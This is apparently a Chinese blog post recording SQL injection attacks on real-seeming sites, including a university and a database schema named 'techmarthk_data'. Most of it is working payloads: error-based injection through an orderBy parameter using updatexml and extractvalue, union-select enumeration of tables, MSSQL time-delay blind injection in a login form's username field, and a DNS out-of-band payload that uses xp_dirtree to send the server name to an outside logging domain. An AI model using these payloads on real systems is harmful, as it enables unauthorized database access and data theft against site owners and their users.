SQL注入实战

1、orderBy报错注入

某大学

www.target.com?orderBy=1

注入为orderBy注入,将orderby更改为id测试时并不能造成报错回显故不能当注入点

正常状态下

经过测试可知共14列,orderBy=15时报错,由于列名可控?orderby=$id

这里使用XPath报错注入,Geohash报错等均不能正常使用

orderBy=1/updatexml(0x0a,if(1=2,1,concat(0x0a,database())),0x0a)--+

orderBy=1/updatexml(0x7e,concat(0x7e,(select database()),0x7e),0x7e)

orderBy=1/extractvalue(1,concat(0x7e,(select database())))

2、联合查询

经测试共有10列其中6,8为回显字段

www.target.com/.php?id=1%20union%20select%201,2,3,4,5,6,7,8,9,10%20--+

.php?id=1 union select 1,2,3,4,5,database(),7,version(),9,10 --+

表名:.php?id=1 union select 1,2,3,4,5,concat(table_name),7,version(),9,10 from information_schema.tables where table_schema='techmarthk_data'--+

3、mssql延时注入

两个路径两个sql为同一手法

延时注入+dnslog外带

post型,注入点为username

POST /xxxxx/xxxxx/login.asp HTTP/2

Host:

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate, br

Content-Type:

Content-Length: 121

Upgrade-Insecure-Requests: 1

username=admin&passwd=1&login=

单引号回显不正常构造payload

admin+and+1=1';WAITFOR+DELAY'0:0:3'--+

判断数据库长度经测试为3

admin and 1=1'if(len(db_name())=3)WAITFOR+DELAY'0:0:3'--+

注出数据库名(这里两条payload有点绕)

区别:第一条payload需要进行url编码即可执行延时,如若直接执行则不会延时

第二条payload不需要进行url编码即可执行延时,如若进行编码则不会延时

admin and 1=1'if(ascii(substring((db_name()),1,1))>1)WAITFOR DELAY'0:0:3'--+

admin and 1=1'if (ascii(substring((db_name()),1,1))>1) WAITFOR+DELAY'0:0:3'--+

dnslog外带

admin';DECLARE @payload varchar(8000);SET @payload=(SELECT @@SERVERNAME) '.3e3b54d658.ipv6.1433.eu.org.';EXEC('master..xp_dirtree"\\' @payload '\foobar$"');--

相关推荐
你的微笑,乱了夏天21 分钟前
linux centos 7 安装 mongodb7
数据库·mongodb
工业甲酰苯胺32 分钟前
分布式系统架构:服务容错
数据库·架构
独行soc2 小时前
#渗透测试#漏洞挖掘#红蓝攻防#护网#sql注入介绍08-基于时间延迟的SQL注入(Time-Based SQL Injection)
数据库·sql·安全·渗透测试·漏洞挖掘
White_Mountain2 小时前
在Ubuntu中配置mysql,并允许外部访问数据库
数据库·mysql·ubuntu
Code apprenticeship2 小时前
怎么利用Redis实现延时队列?
数据库·redis·缓存
百度智能云技术站2 小时前
广告投放系统成本降低 70%+,基于 Redis 容量型数据库 PegaDB 的方案设计和业务实践
数据库·redis·oracle
装不满的克莱因瓶2 小时前
【Redis经典面试题六】Redis的持久化机制是怎样的?
java·数据库·redis·持久化·aof·rdb
清平乐的技术专栏2 小时前
Hive SQL 查询所有函数
hive·hadoop·sql
梦想平凡4 小时前
PHP 微信棋牌开发全解析:高级教程
android·数据库·oracle
TianyaOAO4 小时前
mysql的事务控制和数据库的备份和恢复
数据库·mysql